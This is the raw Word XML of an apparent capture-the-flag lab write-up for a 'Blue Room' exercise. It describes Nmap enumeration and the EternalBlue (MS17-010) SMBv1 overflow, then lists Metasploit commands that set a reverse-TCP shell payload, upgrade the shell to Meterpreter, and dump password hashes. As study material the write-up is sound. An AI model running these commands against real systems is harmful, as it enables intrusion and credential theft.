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8A3520">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="none"/>
          <w:u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223821</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>454489</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="219075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70915394" name=""/>
                      <wps:cNvSpPr/>
                      <wps:spPr bwMode="auto">
                        <a:xfrm rot="0" flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="152398" cy="219073"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:tailEnd type="arrow" len="me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visibility:visible;" from="17.6pt,35.8pt" to="29.6pt,53.0pt" filled="f" strokecolor="#284963" strokeweight="0.50pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue Room</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.     Objective of the room</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B6E8C">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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EternalBlue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 exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( 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MS17-010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) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 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get access to vulnerable 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</w:rPr>
        <w:t xml:space="preserve">machin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</w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">nd escalate user Privileges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i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Cs/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C8ED1">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1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39B2FFB">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1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2.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6712" cy="24671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31232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246710" cy="246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9.43pt;height:19.43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  Enumeration (what did you find?)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8169FF0">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="121212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121212"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I used Nmap to scan the vulnerable machine and found 3 ports open, which were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">135 tcp, 139 tcp and 445 tcp. Port 445 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runs </w:t>
      </w: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SMB (Server Message Block)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used to access shared resources on a network, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EternalBlue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits this port’s vulnerability and if it was not open the exploit would not work. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="121212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 w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="121212"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDA0B5">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/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r>
    </w:p>
    <w:p w14:paraId="3DBD975F">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/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121212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3. ⚠️ Vulnerability identified</w:t>
      </w:r>
      <w:r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r>
    </w:p>
    <w:p w14:paraId="006352AF">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="121212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121212"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability was the open port 445 which eternalblue exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. The exploit specifically targets a vulnerability in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBv1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Server Message Block version 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212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i/>
          <w:iCs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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MS17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is found in older unpatched versions of windows. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability allows an attacker to send specially crafted packets to SMB that cause a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">basically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">when more data is sent than the system has allowed space for, causing it to overflow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">into 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4"/>
        </w:rPr>
        <w:t xml:space="preserve">adjacent memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, EternalBlue sends specially crafted packets to SMB that overflow the buffer and allow the attacker to execute their own code on the t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">arget machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="121212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 w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="121212"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A7948">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi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121212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r>
    </w:p>
    <w:p w14:paraId="3C21F5AC">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/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4.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6712" cy="24671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2172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246710" cy="246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9.43pt;height:19.43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  Tools &amp; commands used</w:t>
      </w:r>
      <w:r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r>
    </w:p>
    <w:p w14:paraId="1B2E962E">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/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121212"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="655C2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Network Scanning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="09509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nmap -p 1-999 &lt;target_ip&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1455C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526AE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nmap -p 445 --script=smb-vuln-ms17-010 10.10.165.91</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="75621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70415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Metasploit Exploitation:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2C3DD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6F714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search ms17_010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(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Search for exploit inside metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="6D95C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6629B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use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecting the exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7A405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471A3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show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(list options in metasploit)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7D05B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74BBB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set LHOST &lt;Your Attack Box's IP&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5D4EE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42FF2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set RHOSTS &lt;target IP&gt; </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="409D0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4132F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set payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1C498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42044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Post-Exploitation &amp; Shell Upgrade:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="127FC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41098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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(Used to upgrade the basic command shell to a more powerful, interactive Meterpreter shell)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2C451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6B738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set SESSION 1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="44B44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2490B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sessions -i 2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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(Used to switch back and interact with Session 2, which is the upgraded Meterpreter session)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="70CC4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769E3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meterpreter &gt; ps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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(Lists all active processes running on the victim machine to find a process ID to migrate into)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="46DE4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29FCC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C:\Windows\system32&gt;whoami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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(Verifies that the exploit worked by checking the current system access level)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5FDF3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</w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="0B0DD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>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i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highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">hashdump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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Used to get all the passwords on the machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i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bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
